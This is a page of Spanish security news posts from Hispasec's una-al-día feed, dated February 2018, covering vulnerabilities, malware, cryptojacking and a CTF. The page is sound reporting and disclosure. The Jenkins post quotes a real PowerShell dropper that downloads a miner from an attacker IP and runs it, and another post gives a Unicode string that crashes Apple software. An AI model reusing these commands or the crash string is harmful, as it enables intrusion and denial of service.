You are here

Hispasec

Subscribe to Hispasec feed
Servicio oficial de una-al-día ofrecido por Hispasec Sistemas.
Updated: 47 min 34 sec ago

Múltiples Vulnerabilidades en Trend Micro Email Encryption Gateway

Fri, 23/02/2018 - 10:44
Varias vulnerabilidades afectan al sistema 'Email Encryption Gateway' de Trend Micro, algunas de las cuales podrían llevar a la ejecución remota de código arbitrario.




Introducción

Email Encryption Gateway es un software basado en Linux que permite el cifrado de correo desde el gateway corporativo.

El cifrado y descifrado del correo en el cliente TMEEG (Trend Micro Email Encryption Gateway) está controlado por un gestor de directivas que permite al administrador configurar directivas basándose en varios parámetros (direcciones de correo remitente, destinatario, palabras clave, etc). Se presenta como una interfaz para configurar los 'MTA' salientes.

Se han encontrado vulnerabilidades en la consola web que permitirían a un atacante no autenticado ejecutar comandos arbitrarios con privilegios de root.

Descripción

El informe contiene doce vulnerabilidades que afectan este producto, que pasaremos a explicar de manera muy resumida en las siguientes líneas. 

Vulnerabilidad 1 (Actualización insegura vía HTTP)

La comunicación con los servidores de actualización no está cifrada. Cuando la aplicación comprueba las actualizaciones espera recuperar un archivo en texto plano con un formato determinado. Si dentro de este fichero se encuentra una nueva actualización, el paquete RPM se descargará sin ningún tipo de validación, lo que facilitaría a un atacante instalar una actualización maliciosa en el sistema.

Vulnerabilidad 2 (Escritura de archivos con ejecución de comandos)

El fragmento de código responsable de descargar el archivo de actualización '(com/ident/pmg/web/CheckForUpdates.java)' permite que un atacante pueda controlar la ruta donde se va a descargar el fichero de actualización. El archivo RPM es escrito como root con permisos 0644. Lo que permite varios vectores de ejecución de código. El vector presentado por los descubridores de la vulnerabilidad consiste en la creación de una tarea cron en el directorio '/etc/cron.d'.

Vulnerabilidad 3 (Actualizaciones sin validar)

El mecanismo de actualización presentado en la vulnerabilidad 2 no valida el archivo RPM descargado. Un atacante podría alterar el archivo RPM e inyectar el suyo propio, siempre que se encuentre en una posición Man in the Middle. Los investigadores ha hecho una prueba de concepto creando un archivo RPM malicioso capaz de ejecutar una 'shell' inversa.

Vulnerabilidad 4 (Ubicación de logs arbitraría con ejecución de comandos)

La ubicación de los archivos de log se puede modificar en el fichero 'logConfiguration.do'. Un atacante podría redigir los logs de MimeBuildServer a /opt/Tomcat/Webapps/root/Pepito.jsp para posteriormente modificar su configuración e incluir código JSP arbitrario, que será ejecutado la próxima vez que se reinicie el servicio.


Vulnerabilidad 5 (Registro sin validación)

El registro de dispositivos se habilita para que los administradores del sistema configuren los dispositivos virtuales al implementarlo. Sin embargo es accesible sin autenticación incluso después de que el dispositivo esté configurado, lo que permitiría a los atacantes establecer parámetros de configuración como nombre de usuario y contraseña de administrador.

Vulnerabilidad 6 (Cross Site Request Forgery)

No hay protección contra CSRF en ningún formulario de la interfaz web. Esto permitiría a un atacante enviar solicitudes autenticadas cuando un usuario autenticado examina un dominio controlado por el atacante. Se podría combinar con la vulnerabilidad 4 y ejecutar código arbitrario de forma remota. También se puede combinar con la vulnerabilidad 2 y la 3, lo que también podría llevar a la ejecución remota de comandos.

Vulnerabilidad 7 (XML External Entity Injection)

El parámetro 'pciExceptionXml' del script 'Configuration.jsp' es vulnerable a 'XML External Entity Injection'. La prueba de concepto utiliza entidades externas para enviar el archivo '/etc/shadow' a un servidor externo. Requiere que el usuario esté autenticado dentro de la consola web, por lo que el atacante necesitará obtener primero unas credenciales válidas. Los posibles vectores para lograr esto incluyen cualquiera de los ataques XSS o la explotación de la vulnerabilidad XSRF.

Vulnerabilidad 8 (Reflected Cross Site Scripting)

Los parámetros 'deniedKeysExpireTimeout' y 'keyAge' del script 'keymanserverconfig.jsp' son vulnerables a XSS.

Vulnerabilidad 9 (Reflected Cross Site Scripting)

Los parámetros:
'decryptionXHeader', 'encryptionXHeader', 'meetingRequestEmailText', 'zdAttachmentPayloadTemplate', 'zdAttachmentTemplate', 'zdMainTemplate', 'zdMainTemplateZdv4' son vulnerables a XSS.

Vulnerabilidad 10 (Stored Cross Site Scripting)

El parámetro 'hideEmails' del script 'editPolicy.jsp' es vulnerable a cross-site scripting. La siguiente solicitud agrega una directiva para la dirección de correo electrónico, la entrada se almacenará de forma no escapada y será renderizada cada vez que se ejecute el script 'Policies.do'

Vulnerabilidad 11 (SQL Injection)

El parámetro 'hidEdittld' del script 'policies.jsp' es vulnerable a SQL-Injection. El script lee un parámetro 'hidEdittld' y lo reenvía al script 'editPolicy.jsp' este script pasará sin ninguna modificación el parámetro al método 'loadRuleDetails' de la clase 'formEditPolicy', y lo usa para generar una instrucción SQL.

Vulnerabilidad 12 (SQL Injection)

El parámetro 'hidRuleId' del script 'editPolicy.jsp' es vulnerable a SQL Injection. El script lee el parámetro 'hidRuleId' y llama a 'DeletePolicy' sin hacer ninguna comprobación de seguridad sobre lo insertado.

Vulnerabilidad 13 (SQL Injection)

El parámetro 'SearchString' del script 'emailSearch.jsp' es vulnerable a SQL Injection. 

CVE

  • CVE-2018-6219
  • CVE-2018-6220
  • CVE-2018-6221
  • CVE-2018-6222
  • CVE-2018-6223
  • CVE-2018-6224
  • CVE-2018-6225
  • CVE-2018-6226
  • CVE-2018-6227
  • CVE-2018-6228
  • CVE-2018-6229
  • CVE-2018-6230


Productos vulnerables
Trend Micro Email Encryption Gateway 5.5 (Build 1111.00)

Información del fabricante y soluciones

https://success.trendmicro.com/solution/1119349-security-bulletin-trend-micro-email-encryption-gateway-5-5-multiple-vulnerabilities

Créditos
Leandro Barragán (Core Security Consulting Services)
Maximiliano Vidal (Core Security Consulting Services)





Mario Parra
@MPAlonso_Más información:
Post original
https://www.coresecurity.com/advisories/trend-micro-email-encryption-gateway-multiple-vulnerabilities
Reportehttp://seclists.org/fulldisclosure/2018/Feb/60




Categories: Seguridad

Cryptojacking. Escuchando a la otra parte afectada del negocio.

Thu, 22/02/2018 - 14:22
Tengo que admitir que dejé de ir a charlas de seguridad hace bastante tiempo. En su lugar, para compensar, voy a las de desarrolladores. No nos engañemos, me encanta mi trabajo, que no es otro que desmontar pieza a pieza lo que otros han construido. Pero también me gusta construir y, por supuesto, si lo que levantas del suelo no es a demanda sino algo que te propones como un reto, mayor es el aliciente. Además, mucho mejor estar cerca de mis “enemigos” que de mis "amigos" ¿no?
Al salir de una de estas charlas me encontré con un viejo amigo que tiene una empresa de desarrollo y hosting. Nos fuimos a saquear el aperitivo y se nos unieron varios compañeros más. Muy pronto, la conversación derivó en uno de los temas de moda y del que ya hemos hablado alguna que otra vez por aquí: el cryptojacking. Aunque intenté darme a la fuga antes de que el tema cogiese más protagonismo, mi amigo me paró en seco. “Ah!, pues aquí el amigo, que se dedica a seguridad, nos puede dar su visión del tema.”
El tópico interesaba, y mucho, y de nada sirvieron las cinco excusas nivel oro de mi libro de excusas para huir de ciertas situaciones sociales (lógico, quienes me conocen saben cómo contratacarlas). Así que teníamos por delante veinte minutos de conversación acerca de la dichosa minería. No obstante, al final mereció la pena. Pude constatar la preocupación con la que asumían la problemática. Me pareció interesante dar eco aquí de ciertos aspectos.

El cambio de economía
Me comentaban qué, de los servidores atacados en sus sistemas, normalmente accedían (un clásico) a través de una vulnerabilidad web. Cuando antes era subir una Shell, ahora es, con alarmante diferencia, subir un minero. No al propio servidor, que eso pega un cantazo tremendo en los consumos, muy monitorizados, de CPU de las máquinas, sino, evidentemente, como recurso para que se los descarguen los navegadores.
Antes, si subían un phishing o un troyano, el visitante no se percataba del sitio donde le habían encasquetado el paquete. Eso era porque la visita era indirecta en la mayoría de ocasionas y otras veces, por supuesto, la infección es silenciosa y el visitante no se percataba donde “le habían untado la tostada”.
Sin embargo, con el minado si se nota. Llega al lugar y el ventilador se pone a fibrilar. La CPU a tope, tanto que podría calentar una habitación en un par de horas. Entonces sí que te das cuenta donde te la están dando. El visitante lo tiene claro, ctrl-w, pestaña cerrada y sitio del que desconfía. La pérdida de visitas, marca, prestigio, etc, que tanto cuesta construir corre el riesgo de irse al traste. También la inclusión de lista negra, etc.
Era curioso, como incluso en ese falso dilema de escoger entre las “antiguas” amenazas o esta nueva moda del minado, preferían el suplicio de tener un merodeador con una Shell o que les alojasen un troyano. Ambos, casos que suelen tener, junto con el mass mailing, bastante trillados y cuya ventana de existencia está bastante acotada. Sobre todo, porque han ido perfeccionando sus soluciones in-house o las de terceros.

Vectores de entrada
Todo vale en la guerra. Los métodos de entrada no suelen variar, pero esta vez el logro no es hacerse con el sistema sino “colar” el minero a toda costa. Escuché atentamente, aunque nada sonaba a novedoso, ellos no hablaban de extensiones para el navegador maliciosas, minería explícita (caso PirateBay), etc. Su punto de vista, lógico, es defender el negocio y su preocupación quienes les visitan, la experiencia del usuario.
Los casos eran curiosos. Foros vulnerables con comentarios que incluían scripts, cross-site scripting persistentes, funcionalidad de user-content muy permisivas e incluso un notorio caso donde los señores crackers habían añadido un CDN de su propia red de contenido donde, por supuesto el usuario no descargaba precisamente versiones minimizadas del framework de moda.
Algo curioso que les comenté era el hecho de las campañas de anuncios con mineros. Nada nuevo bajo el sol, pero desconocían ese vector. Curioso que les sorprendieran, aunque si recordaban el viejo truco de endiñar un exploit a través de un, en sus tiempos, anuncio en flash (que en paz descanse de una vez).

Posibles defensas
Apurando ya los últimos sorbos de la copa (en realidad eran vasos con refrescos, pero copas queda mejor literariamente), tocaba hablar de cómo te defiendes de algo así. Había unanimidad en que andaban un poco a tientas con las soluciones. Prácticamente se usaban los mismos enseres y técnicas que el rastreo de shells o cambios en los sitios que con el malware o phishing. Eso sí se ponían remedio, pues también confesaron que…oh, sorpresa, no actuaban hasta que alguien les avisaba.
Hubo quien proponía inyectar scripts para detectar y detener mineros. Mi sonrisa me delató. Eso es una carrera de ratas recursiva, al final siempre hay un anti-anti-anti-anti…hasta la saciedad. Tú me inyectas un script para detenerme, yo meto una rutina de antidetección, tu detectas mi rutina que detecta tu rutina y…quien haya visto a los hermanos Marx sabe de qué estamos hablando.
También se habló de cazar esos scripts por la huella que dejan. Es decir, rastreo los scripts los ejecuto en una sandbox y en base a un perfil de consumo alerto de posible minero. Si y no. Eso puede durar lo suficiente como para que o bien procedan a detectar ese ambiente e inhibirse (como hacen el malware cuando detecta una máquina virtual) o simplemente el script se trocea en partes y no se activa su función principal hasta que estás se recomponen en una sola. Incluso dudaba del perfil de consumo como capacidad para hacer vetting de los scripts, sobre todo porque hay scripts que sí que legítimamente requieren consumo: WebGL, generación de gráficas, video incrustado, etc. Si bien hay capacidad y recorrido para la heurística, no creo (el pesimismo del auditor) que sea la panacea.

¿Pero y que solución le damos?
Nos anuncian que va a dar comienzo otra charla. Apuramos “la copa” y cogemos unos cuantos canapés sin que se notase mucho, por si aprieta el gusanillo más tarde. Estaba ya a punto de librarme de la pregunta que se estaba gestando minutos antes. A los 123 grados de giro de un espectacular quiebro de cintura que ya quisieran el propio Messi o Cristiano y dos pasos de distancia, escuché la temida interpelación: “¿Oye, pero dinos, esto como ves que pueda solucionarse o al menos paliarse, tu que trabajas con…?”
Francamente. Habíamos estado hablando de soluciones post infección y nadie de nosotros se había percatado de lo obvio. “Bueno, si tienes agujeros y muchos, lo más probable es que antes o después alguien pase por ahí y se aproveche de ellos. ¿Habéis probado a auditar vuestra infraestructura de forma periódica o al menos implementar un desarrollo seguro en lo que hacéis?”

Por supuesto, era una obviedad, no se hacía, pero estaba claro que esto es como la salud. Es preferible cuidarla antes que tener que poner soluciones cuando ya es demasiado tarde, cuando todo es paliativo, crónico e irreversible. Ellos se llevaron un par de viejos conceptos de seguridad, pero nuevos para ellos. Y yo me llevé la impresión de que los que nos dedicamos a la seguridad deberíamos escucharlos más donde realmente están los que tienen los problemas que pretendemos solucionar.



David García
@dgn1729







Categories: Seguridad

Coldroot pasa desparecibido para los motores antivirus durante dos años

Thu, 22/02/2018 - 09:30
Coldroot es un RAT que inicialmente estaba diseñado para infectar a sistemas MacOS, pero se está empezando a distribuir en otros sistemas operativos de escritorio. 

Este troyano sigue pasando inadvertido para la gran mayoría de antivirus, a pesar de que el código fuente se encuentra disponible en un repositorio de Github. El código se liberó a mediados de 2016, pero al no tener una gran popularidad no suscitó mucho interés. Sin embargo, recientemente ha pasado a distribuirse de manera activa. 




El investigador Patrick Wild ha descubierto una variante de este RAT recientemente. Según apunta Wild en su análisis, el código que se encuentra online es distinto al que se puede encontrar en dicha muestra, aunque el comportamiento de la muestra coincide con el antiguo troyano que podemos encontrar en Github. Por tanto concluye que este troyano es una versión mejorada y con nuevas funcionalidades de la versión de 2016. 

Entre otras características, esta nueva versión puede habilitar sesiones de escritorio remoto, tomar capturas de pantalla para convertirlas en un 'streaming' de la actividad del usuario y ejecutar y parar procesos en el sistema. Además, es posible enviar y obtener ficheros de la máquina y ejecutarlos. 




Toda la información interceptada del equipo de la víctima es enviado a un panel web. En el troyano, se encuentran los datos de contacto del autor original 'Coldzer0' pero no parecen tener más intención que distraer a los investigadores.

Tras haber obtenido una mayor atención en los últimos días, posiblemente pronto veamos las detecciones de este malware aumentar por los distintos sistemas antivirus. 


Fernando Díaz
fdiaz@hispasec.com
Más información:
Coldroot:https://digitasecurity.com/blog/2018/02/19/coldroot/
Categories: Seguridad

Más de 2,7 millones de euros en criptomonedas desde instalaciones de Jenkins comprometidas

Tue, 20/02/2018 - 12:02
El equipo de CheckPoint ha descubierto la que puede ser la mayor operación de minado de criptomonedas: el equivalente a más de 3 millones de dólares de la criptomoneda Monero (XMR) han sido generados utilizando la capacidad de procesado de miles de servidores Jenkins mal configurados.


Jenkins es un popular software de integración continua (CI) de código abierto escrito en Java. Actualmente es mantenido por la comunidad y por el proveedor de servicios de CD/CI CloudBees.

El grupo criminal, de origen chino, se ha valido de instalaciones mal configuradas o inseguras para instalar el troyano encargado de minar la criptomoneda.

Para inyectar el código malicioso, los atacantes aprovechan la vulnerabilidad etiquetada con CVE-2017-1000353 que permitirá saltar restricciones de seguridad y ejecutar comandos en la interfaz CLI de Jenkins:

  1. Primero se comprueban las capacidades y permisos del cliente víctima.
  2. En función de la respuesta anterior, se inyecta el payload que contiene entre otras cosas el código encargado del minado de la criptomoneda.

Inyección del código malicioso. Fuente: https://research.checkpoint.com
Esta segunda fase del ataque es la más interesante:

  1. Primero se ejecuta una instancia de PowerShell en segundo plano: powershell.exe -WindowStyle Hidden: 
  2. Se declara un objeto de tipo web-client: $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT
  3. El dropper descarga el software encargado del minado: $P.DownloadFile(‘http://222.184.79.11:5329/minerxmr.exe’, ‘C:\\Windows\\minerxmr.exe’)
  4. Para posteriormente ejecutarlo con el comando: START C:\\Windows\\minerxmr.exe


Los atacantes están bien organizados y distribuyen las operaciones de minado entre diferentes 'pools'. Sin embargo, todas las ganancias están centralizadas en una única cartera, que al momento de escribir la noticia, supera ya los 10829 XMR. El equivalente a unos 2,75 millones de euros al cambio.


Algunos IOCs:

Dominios e IP:

  • 222[.]184[.]79[.]11
  • 183[.]136[.]202[.]244
  • btc[.]poolbt[.]com
  • shell[.]poolbt[.]com
  • xmr[.]btgirl[.]com[.]cn
  • btc[.]btgirl[.]com[.]cn


Muestras:

SHA256: 0bb4503cc52530ddadb102fa4010fb4d89af88aca846d4b16f601d0702134246 

SHA256: 06f8eda46fd6bdc11b8ec4d18a0f0afbf3d47f82cea8363d342975896582a715

SHA256: f0430130a2f3549b1aeff0a9fb2246f68f585a7c1d312c7be385a1cf5f37e70d

SHA256: c87d294cb0384cb56f4829d58cdd3f53572d3f95c2133a9b1da5f5bc1710f22f

SHA256: f750d6da918a5f2f2c442a339821ffebcad4b61e4ca1684bac0e7df98416a794

SHA256: 3002551eebaf486d77a2b81d87db553ad8632bb132553e306395c5da589171fe

SHA256: 213a23219ff89c412f92aa1fdf7152178a81514014ee1cc4ffee97e725ee63a3

SHA256: ff8c97cd55523cbdceef80407269d35bbf78abcbf807426c12d9debe1ce498d9

SHA256: 2beaa23907c40cfcb705844f4f515ff81a788abe1aed2c8d23626d9d735968ae

SHA256: b22fa98c3ee99222c4e827a9745f206ccf7cd40530459a92f183e148b0df5ce9


Francisco Salido
fsalido@hispasec.com
Más información:
Jenkins Miner: One of the Biggest Mining Operations Ever Discovered
https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/





Categories: Seguridad

Corregidas múltiples vulnerabilidades en RubyGems

Mon, 19/02/2018 - 09:30
Rubygems, el popular gestor de paquetes para Ruby, se ha actualizado urgentemente para dar solución a un paquete de vulnerabilidades que le afectaban.
RubyGems es un gestor de paquetes para el lenguaje de programación Ruby que proporciona un formato estándar y autocontenido (llamado gem) para poder distribuir programas o bibliotecas en Ruby, una herramienta destinada a gestionar la instalación de éstos, y un servidor para su distribución.
Aunque no se ha facilitado mayor información, las vulnerabilidades corregidas han sido las siguientes:
  • Salto de restricciones (Path traversal) a la hora de escribir a un enlace simbólico de directorio.
  • Salto de restricciones (Path traversal) durante la instalación de gemas.
  • Vulnerabilidad de deserialización de objetos asociada al dueño de una gema.
  • Incorrecta gestión de los campos octales en las cabeceras de ficheros tar.
  • Incorrecta gestión de ficheros duplicados en un paquete.
  • Incorrecta validación de las URLs en el atributo spec homepage que podría facilitar ataques XSS.

Las vulnerabilidades fueron descubiertas por nmalkin, plover, Yasin Soliman y se ha publicado la versión 2.7.6 para corregirlas. Se puede actualizar a esta versión desde el propio gestor de rubygems mediante:
gem update --system

Más información:
RubyGems 2.7.6 includes security fixes:http://blog.rubygems.org/2018/02/15/2.7.6-released.html

Rubygems, no todas las gemas son piedras preciosas
http://unaaldia.hispasec.com/2015/06/rubygems-no-todas-las-gemas-son-piedras.html
Categories: Seguridad

Apple vuelve a sufrir ataques por "Text bombs"

Sun, 18/02/2018 - 12:39
Si el pasado mes Apple se veía afectada por una vulnerabilidad en iOS e iMessage, denominada chaiOS (CVE-2018-4100), esta semana se ha vuelto comprobar que los ataques mediante caracteres Unicode siguen en total vigencia, con una nueva variante, al recibir caracteres en lengua Telugu (India).

El error es debido a una incorrecta gestión de los caracteres Unicode que forman parte del set Telegu, la segunda lengua más utilizada en India.En concreto, la secuencia en formato Unicode "U+0C1C U+0C4D U+0C1E U+200C U+0C3E", desencadenaría que cualquier usuario que reciba o procese un mensaje o notificación que utilice dicha combinación, pueda comprobar como la aplicación utilizada se bloquea o, simplemente, se cierra.Un estudio más completo por parte del desarrollador Manish Goregaokar (@Manishearth), ha determinado que existen más combinaciones, incluso de otras lenguas como la Bengalí, que reproducen el fallo, y otros usuarios han publicado scripts con las posibles variantes.
Actualmente, ésta vulnerabilidad de denegación de servicio o "Text bomb" sigue sin poder resolverse de manera oficial, y se verían afectadas todos las versiones de iOS, macOS, watchOS y, por ende, cualquier aplicación instalada. Por ejemplo, diferentes pruebas han demostrado que se pueden provocar fallos en iMessage:


O incluso en el gestor de redes, al utlizar esa combinación en el nombre de una red wifi (el SSID), tal y como pudo comprobar el investigador @info_dox:

https://twitter.com/info_dox/status/964205281700802561
Apple está preparando un conjunto de actualizaciones que serán desplegadas lo antes posible.

José Mesa
@jsmesa
Más información:

Picking Apart the Crashing iOS String
https://manishearth.github.io/blog/2018/02/15/picking-apart-the-crashing-ios-string/

Basta un solo carattere per far crashare qualsiasi prodotto Apple (video)
http://www.mobileworld.it/2018/02/14/carattere-indiano-crash-iphone-mac-ipad-144881/

Script to generate all Devanagari, Bangla and Telugu strings known or suspected to crash macOS and iOS
https://github.com/hackbunny/viramarama

The latest iOS update fixes a glitch that would let others crash your phone with a text message
https://techcrunch.com/2018/01/23/the-latest-ios-update-fixes-a-glitch-that-would-let-others-crash-your-phone-with-a-text-message/

About the security content of iOS 11.2.5
https://support.apple.com/en-gb/HT208463
Categories: Seguridad

Evolución de los ataques que usan documentos de Word

Sat, 17/02/2018 - 10:00
Una nueva técnica multi-etapa permite la infectar dispositivos a través de documentos de Word sin utilizar macros.

Ya es habitual el uso de macros en programas de Microsoft Office como medio de ataque. Sin embargo, el equipo de investigadores de Trustwave se hace eco de una nueva técnica que no requiere el uso de macros para infectar los dispositivos.

La muestra analizada fue descubierta en una campaña de spam por correo electrónico cuyo objetivo final era la instalación de un ejecutable encargado de capturar las contraseñas de la víctima.

El proceso de infección sucede en cuatro etapas:
Proceso de infección. Fuente: https://www.trustwave.com/
  1. La víctima recibe un correo con un archivo de Word adjunto, que contiene objetos OLE con referencias externas.
  2. Al abrir esta referencia externa se descargará y ejecutará un fichero RTF que aprovechará la vulnerabilidad CVE-2017-11882 para ejecutar código arbitrario de forma remota (RCE).
  3. Sirviéndose de un fallo en la gestión de la memoria en el Editor de Ecuaciones de Microsoft Office, se consigue ejecutar un comando MSHTA que descargará y ejecutará una aplicación HTA.
  4. Esta aplicación descargará y ejecutará el script para Visual Basic que a su vez descargará e implantará el malware en la máquina.

Referencia al archivo RTF remoto. Fuente: https://www.trustwave.com/
El malware se encarga de capturar contraseñas de servicios de email, ftp y del navegador. Para ello hace uso de las API RegOpenKeyExW y PathFileExistsW de Windows.

Desde el punto de vista del atacante, el número de etapas requeridas para la infección reduce sus probabilidades de éxito. Sin embargo, el uso de extensiones menos habituales en los procesos de distribución de malware (DOCX, RTF y HTA), reduce las probabilidades de que los correos sean bloqueados.

Algunos de los asuntos utilizados en estos correos son:

  • TNT STATEMENT OF ACCOUNT 
  • Request for Quotation (RFQ) 
  • Telex Transfer Notification
  • SWIFT COPY FOR BALANCE PAYMENT


IOCs compartidos por Trustwave:

Fichero DOCX
MD5: F7DA16B16567A78C49D998AE85021A0F
SHA1: 776C469861C3AC30AA63D9434449498456864653
https://www.virustotal.com/#/file/05d54ff3fb7e4d8cfaafcbba08ec217c1bff60216e23c3fdca0bbc80c627c9bc/detection

Fichero RTF
MD5: 79BCAFD6807332AD2B52C61FE05FFD22
SHA1: 0D8215F88C75CD8FBF2DFAB12D47B520ECE94C52
https://www.virustotal.com/#/file/e6c9b4ac3c1adda9733eee44e638d2127ab6ff00176c363437263712c7421f66/detection

Fichero HTA
MD5: 11B28D4C555980938FE7440629C6E0EC
SHA1: 0ADD65090EF957AA054236FF6DD59B623509EC8B
https://www.virustotal.com/#/file/fcc1bd24951b5dca31147bbc33d3566c23fb1a78a9afcbb62d0ae9e7695517ed/detection

Payload final
MD5: EDB27CC321DF63ED62502C172C172D4F
SHA1: C4AA4E70521DD491C16CE1FBAB2D4D225C41D1EA
https://www.virustotal.com/#/file/69bde8f8a0f2a23956eb9c0fa8782dc1e89f534eb8e01e0c8e193e07e72ac76c/detection




Francisco Salido
fsalido@hispasec.com
Más información:
Multi-Stage Email Word Attack Without Macroshttps://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/




Categories: Seguridad

Miles de sitios webs de los gobiernos hackeados para minar criptomonedas

Fri, 16/02/2018 - 10:00
Se han descubierto miles de webs de varios gobiernos del mundo que forzaban a los visitantes a minar criptomonedas.


Extraída de Hackbusters
El script de minado ha sido encontrado en más de 4.000 webs entre las que destacan el Servicio Nacional de Salud de Reino Unido (NHS) y el sistemas judicial de los Estados Unidos.

Los ciberdelincuentes consiguieron modificar un complemento de accesibilidad de terceros llamado Browsealoud, el cuál estaba presente en todas las webs afectadas. Una vez más, la secuencia de comandos que se insertó pertenece a CoinHive, al cuál ya hemos mencionado en otros artículos.

Como ya hemos mencionado en otras ocasiones, los usuarios al visitar una web que contiene código de CoinHive, notan como la potencia de su procesador se ve aumentada notablemente para minar criptomonedas sin conocimiento de ello. Esto es conocido como criptojacking.

El encargado en dar la voz de alarma fue Scott Helme (Consultor de Seguridad en Reino Unido). Descubrió el hackeo después de que uno de sus amigos mencionara haber recibido alertas de antivirus en la web del gobierno y lo publicó en su cuenta de Twitter.

El complemento vulnerado pertenece a la empresa TextHelp. Martin McKay, CTO de dicha compañía escribió un post para tranquilizar a los usuarios. En él, especifica que el completemento está pasando una serie de revisiones de seguridad.

Debido a esta acción, el completemento ha sido borrado eventualmente de todas las webs sin que los encargados de dichas páginas deban realizar ninguna acción.

Además, la compañía asegura que no se ha comprometido datos de ninguno de los usuarios y que sus clientes recibirán una actualización tan pronto como la investigación de seguridad haya finalizado.


Daniel Púa
@arrowcode_
dpua@hispasec.com
Más información:

Lista de webs vulneradas:
https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/

Web de CoinHive:
https://coinhive.com/

Tweet de Scott Helme dando la alarma:
https://twitter.com/Scott_Helme/status/962684239975272450

Post de Martin McKay:
https://www.texthelp.com/en-gb/company/corporate-blog/february-2018/data-security-investigation-underway-at-texthelp/





Categories: Seguridad

Una-al-mes: Misión#004

Thu, 15/02/2018 - 10:00
Cuarta misión con un toque más... "televisivo".

Ya está aquí la cuarta entrega de UAM. Con el paso de las anteriores hemos visto como ha habido cosas que os han gustado más, y otras que os han parecido menos llamativas. Pensando ideas hemos decidido seguir intentando conseguir el formato que más ganas os de para participar, y para ello vamos a innovar.

En esta misión vamos a darle un toque televisivo... Vamos a dar cierta ambientación de una serie conocida para ver vuestra respuesta. En vez de estar en la piel de Rick, nos vamos a poner en la piel del personaje Fry de Futurama, el cuál tiene un problema...

Como siempre, tenéis el grupo de telegram y el correo para enviarnos las dudas/sugerencias que tengáis tanto de la prueba como del proyecto UAM.

Grupo de telegram: https://t.me/joinchat/AKWAVkxjj1GTE_cvkvQvIQ
E-mail: unaalmes@hispasec.com

Ya sabéis que una vez que superéis el reto, debéis enviarnos la flag y el write-up del mismo al correo arriba mencionado.

Además, como novedad, a partir de ahora, el write-up mejor explicado será publicado, de manera que haya 4 ganadores. Los tres primeros en resolverlo y el que mejor explique su solución.

En esta misión agradecemos el aporte realizado por Fernando Denís (@fdrg21), Carlos Ledesma y Fernando Díaz (@entdark_).

El formato de la flag es UAM{...}.

La URL para comenzar el reto la tenéis en el apartado "Más información" de esta misma página.

Os dejo con el reto, ¡mucha suerte!

Daniel Púa@arrowcode_
dpua@hispasec.comMás información:
Acceso a Mission#004:http://34.253.233.243/mission4.php





Categories: Seguridad

Virus periodístico

Wed, 14/02/2018 - 00:00
Lunes 12 de febrero 9:00 am. Llega a mis manos, a través de un compañero de trabajo, una noticia publicada en el periódico 'El País' titulada “Virus informático”. Como informático dedicado precisamente a la seguridad informática, un titular tan directo me invita a prepararme un café que acompañe la lectura y me caliente antes de comenzar con mis responsabilidades.




9:00h: Me dispongo a leer el artículo de la escritora Ana Merino (Madrid, 1971), una poeta, dramaturga y teórica española de la historieta, perteneciente a la Generación Poética del 2000. No lo digo yo, lo dice Wikipedia.

9:01h: Empezamos el artículo que viene subtitulado con sus intenciones: “Los hacker son un nuevo peligro de una gravedad incalculable y se requiere de una acción seria, coordinada y efectiva”. La escritora no esconde ninguna carta.

9:02h: Sorbo el café y me adentro en el primer párrafo del artículo: “Estarán contentos los que desarrollaron los primeros virus informáticos y dieron lugar a un linaje de seres siniestros que se pasan la vida tecleando destrucción y toxicidad cibernética”. Vale, esto es una sátira. Me da la impresión de que va a ser una entrada con dosis de humor desternillante. Sigo leyendo.

9:03h: Cito textualmente: “Estos sujetos, esparcidos por el mundo, son los nuevos discípulos del sabio Frestón, que en su día se las hizo pasar canutas a Don Quijote y obstaculizó todo lo que pudo sus hazañas”. Oops! Lo que podía ser un artículo con altas dosis de humor se transforma en mi mente en que ForoCoches lo ha vuelto a hacer y se la han colado a 'El País'. Cambio de pestaña y busco en ForoCoches. No encuentro nada.

9:10h: “Estos malévolos embrujos no son anécdotas aisladas y hacen mucho daño. Afectan a las bases de datos de hospitales y otras infraestructuras neurálgicas de nuestra sociedad. Son un nuevo peligro de una gravedad incalculable y se requiere de una acción seria, coordinada y efectiva”. Empiezo a vislumbrar lo que ha pasado aquí: a esta mujer le ha “entrado” un ransomware y se ha venido arriba maldiciendo a diestro y siniestro, intentando crear opinión sobre un tema del cual es una completa ignorante, en el buen sentido.

9.12h: “Necesitamos castigos estrictos y disuasorios, neutralizar a estos seres abyectos.“ Con esta frase me acaba de ganar. Más bien con el adjetivo que finaliza la frase: abyectos. ¿Qué significa?. Me suena a algo malo pero disculpad mi ignorancia, tuve que buscarlo para dimensionar su magnitud...

abyecto, ta.Del lat. abiectus, part. pas. de abiicĕre 'rebajar, envilecer'.
  1. 1. adj. Despreciable, vil en extremo.
  2. 2. adj. desus. Humillado, herido en el orgullo.


9.15h: ...y termino: “Expulsarles del universo informático y las redes, que no puedan volver a navegar, ni a programar, ni a embrujar ninguna base de datos”. Un final más propio de Dragones y Mazmorras que de un artículo de opinión sobre el fortalecimiento de la legislación contra amenazas cibernéticas.

En cierto modo, aunque me sentía aludido por esta escritora perteneciente a la generación poética del 2000 y comprendiendo su mensaje, (eso sí, carente de una argumentación sensata), su ofensa es debida a un mal uso de la palabra 'hacker'. Quizás ella desconozca que el término 'hacker' dejó de ser despectivo hace ya muchos años y que el 20 de diciembre de 2017 la RAE incluyó la siguiente acepción: "persona experta en el manejo de computadoras, que se ocupa de la seguridad de los sistemas y de desarrollar técnicas de mejora". Pero con él ha ofendido a una minoría y todos sabemos que, en los tiempos que corren, ofender a una minoría debe de ir acompañado de una disculpa.


Fernando Ramírez
@fdrg21
Más información:
Artículo El País:https://elpais.com/elpais/2018/02/08/opinion/1518110247_157665.html
Categories: Seguridad

Driver vulnerable en Gundam Online (BANDAI NAMCO)

Tue, 13/02/2018 - 10:29
Los laboratorios de Kaspersky detectan una muestra que es constantemente clasificada para análisis exhaustivos al ser detectada por su plugin de exploits. Al examinarla, resulta ser un driver de Gundam Online, el videojuego de NAMCO.

